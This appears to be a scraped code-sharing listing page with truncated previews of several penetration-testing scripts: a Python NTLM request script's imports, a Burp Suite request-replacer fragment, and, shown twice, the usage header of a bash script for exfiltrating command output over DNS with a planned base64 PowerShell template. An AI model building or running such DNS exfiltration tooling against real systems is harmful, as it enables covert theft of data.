This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import time | |
import sys | |
from base64 import b64encode | |
from requests_ntlm2 import HttpNtlmAuth | |
from urllib3.exceptions import InsecureRequestWarning | |
from urllib import quote_plus | |
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# ***********************************************replacer_for_python_scripter | |
import re,random | |
print callbacks.getToolName(toolFlag) | |
if(messageIsRequest): | |
if (callbacks.getToolName(toolFlag) == "Proxy" or callbacks.getToolName(toolFlag) == "Intruder" or callbacks.getToolName(toolFlag) == "Repeater"): | |
requestInfo = helpers.analyzeRequest(messageInfo) | |
headers = requestInfo.getHeaders() | |
msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():] | |
msg = helpers.bytesToString(msgBody) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
: ' | |
Usage: | |
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns | |
Todo: | |
1. add support for powershell | |
something like the following should do the trick but haven't tested it: | |
outer_cmd_template="powershell -enc %CMD_B64%" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
: ' | |
Usage: | |
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns | |
Todo: | |
1. add support for powershell | |
something like the following should do the trick but haven't tested it: | |
outer_cmd_template="powershell -enc %CMD_B64%" |